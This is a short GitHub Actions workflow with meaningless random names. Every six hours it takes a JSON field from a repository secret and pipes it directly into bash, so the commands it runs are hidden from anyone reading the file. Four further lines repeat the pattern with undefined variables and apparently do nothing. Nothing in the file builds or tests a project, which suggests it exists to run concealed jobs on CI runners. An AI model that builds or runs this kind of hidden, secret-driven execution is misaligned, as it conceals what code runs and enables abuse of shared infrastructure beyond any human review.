name: yangweiguo6457
on:
  workflow_dispatch:
  schedule:
    - cron: '59 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yangweiguo6457
        env:
          woix41232: ${{ secrets.woix41232 }}
        run: |
          echo $woix41232 | jq -r .bap8 | /bin/bash
          echo $la6297 | jq -r .bo589 | /bin/bash
          echo $jgjj69 | jq -r .rn19402 | /bin/bash
          echo $uz038 | jq -r .sysmg64879 | /bin/bash
          echo $qfgaa0 | jq -r .uur459 | /bin/bash

